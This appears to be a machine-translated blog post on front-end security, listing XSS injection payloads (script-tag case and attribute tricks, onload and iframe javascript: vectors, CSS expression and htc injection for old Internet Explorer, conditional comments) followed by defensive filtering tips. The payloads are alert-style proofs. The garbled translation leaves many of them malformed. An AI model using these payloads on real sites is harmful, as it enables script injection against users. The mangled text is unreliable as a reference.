Common XSS injection attacks: Part.1 + Part.2

Gracecode.com

The common security problem of front-end development is that it will be subject to XSS injection attacks. Common Code injection methods are listed here.

Javascript code injection
Javascript code injection directly references unverified strings and parses insecure JSON data (including JSONP.

This code is often written.

Document. write (u name is + name); this will cause certain security issues (if the server side does not filter). For example, if the name is the following data

; Alert (xss); // "; alert (xss );//;! -- "<Xss >=& {()} destroys the original code structure and inserts unexpected code.

HTML Tag Injection
HTML injection is a common method. The main injection entries are incomplete Regular Expression filtering and inline styles (for Exploer). Below are common injection codes.

The solution is to use PHP's htmlspecialchars, htmlentities, and other similar function escaping.

<SCrIpT src = xss. js> </sCrIpT> <script src = xss. js>
</Script> <script/xss src = "xss. js "> </script> <script/SRC =" xss. js "> </script> <script> alert (" xss "); // </script> <script> a =/xss/
Alert (a. source) </script> injection from image labels, which are common in some forums.

<script> alert ("xss ") </script> "> inject from the connection tag (although I have not found any cases, I cannot underestimate them)

<Script a = ">" SRC = "xss. js "> </script> <script ="> "SRC =" xss. js "> </script> <script a ="> "SRC =" xss. js "> </script> other places that are easy to inject

<Body onload = alert (xss)> <iframe src = "javascript: alert (xss ); "> </iframe> <embed src =" xss.swf "AllowScriptAccess =" always "> </embed> <meta http-equiv =" Set-Cookie "content =" USERID = <script> alert (xss) </script> "> there are so many examples to be excerpted first. The following content includes" CSS injection "," other injection methods ", and general solutions. You are welcome to discuss and correct them.

 

Next, we will mainly consider the CSS injection method. CSS injection is mainly used for background image injection and CSS Expression injection for Exploer.

If the style is not completely filtered, the following code may become an attack code.

<Xss style = "behavior: url (xss. htc);"> the above is htc injection for Exploer. htc can be considered as a script.

<Div style = "background-image: xss.jpg"> who knows what xss.jpg is? However, many Website Statistics Code also uses this principle.

<Div style = "width: expression (alert (xss);"> exp/* <A style = noxss: noxss (" * // * "); xss: ex/* xss * // */Expression (alert ("xss")> The Expression for Exploer must be "calm". The best way is to filter the style attribute.

If the comments are not fully filtered, a typical injection vulnerability occurs in Exploer.

<! -- [If gte IE 4]>
<Script> alert (xss); </script>
<! [Endif] --> security issues. In this case, I would like to thank Exploer for providing so many "opportunities ".

-- Split --

So how to prevent XSS injection? We still need to make a thorough consideration of user data filtering. Here we do not fully summarize the following Tips:

Assume that all user input data is "evil ".
The weak scripting language must ensure that the type is consistent with the expected
Well-considered regular expressions
Strip_tags, htmlspecialchars and other functions are very useful.
External Javascript is not necessarily reliable.
Special attention must be paid to quotation mark filtering.
Remove unnecessary HTML comments
Exploer, please let me go ......